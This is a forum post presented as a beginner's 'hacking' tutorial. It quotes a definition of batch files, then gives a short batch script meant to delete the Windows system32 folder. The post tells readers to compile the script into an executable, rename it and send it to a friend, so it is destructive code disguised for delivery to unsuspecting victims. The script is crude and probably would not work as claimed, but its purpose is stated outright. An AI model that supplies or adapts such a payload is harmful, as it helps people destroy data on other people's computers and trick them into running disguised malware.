IT Community Malaysia

Members Login
Username 
 
Password 
    Remember Me  
Post Info TOPIC: Batch File Programming For Hacking - Corrupting The System! (1)


Smasher Hax

Status: Offline
Posts: 267
Date:
Batch File Programming For Hacking - Corrupting The System! (1)
Permalink  
 


Greeting! How re you there baby? let getting start.

Okay, first you have to know what the fuc* Batch file. Now if we are going to wikipedia and find what is Batch file.. it would said this...

"

In DOS, OS/2, and also Microsoft Windows, batch file is the name given to a type of script file, a text file containing a series of commands to be executed by the command interpreter.

A batch file may contain any command the interpreter accepts interactively at the command prompt. A batch file may also have constructs ( IF, GOTO, Labels, CALL, etc.) that enable conditional branching and looping within the batch file.

Similar to job control language and other systems on mainframe and minicomputer systems, batch files were added to ease the work required for certain regular tasks by allowing the user to set up a script to automate them. When a batch file is run, the shell program (usually COMMAND.COM or cmd.exe) reads the file and executes its commands, normally line-by-line.[1]Unix-like operating systems (such as Linux) have a similar, but more flexible, type of file called a shell script.[2]

The filename extension .bat was used in DOS, and the Windows 9x family of operating systems. The Microsoft Windows NT-family of operating systems and OS/2 added .cmd. Batch files for other environments may have different extensions, e.g. .btm in 4DOS and 4NT related shells.

There have been changes to the detailed handling of batch files; some of the detail in this article is applicable to all batch files, while other details apply only to certain versions."

 

bla bla bla and bla bla bla.... i hat eto read it.. but it is very "helpfull"... waarr... lets getting start with the command..

 

Second, i want you to know "Delete" command.. it is just "del". So, if you want to delete some file just type "del [filename]".. simple isnt it??

You to have to know how to use CMD/command Prompt first.. then it could be easy to you for make this corrupting system batch file...

 

Now, open your notepad.. then type this:

 

@echo off

cls

cd c:\windows

del system32

 

Now, @echo off command is to hide the directory file from shown.. cls command is to clear up CMD windows... cd c:\windows, it is mean you re going to get in "windows" folder...

del system32 is mean you re going to delete system32 file...

 

 

Now, save this srcipt as all file and name it as corrupt.bat... now go to the Quick Batch File Compiler and compile it as executable file... then, rename it and send to your friend... ..

Please give feedback...

 



__________________

I am Sharper

ITC - Internet Moderators

Mods Name: KA

Page 1 of 1  sorted by
Quick Reply

Please log in to post quick replies.

Tweet this page Post to Digg Post to Del.icio.us


Create your own FREE Forum
Report Abuse
Powered by ActiveBoard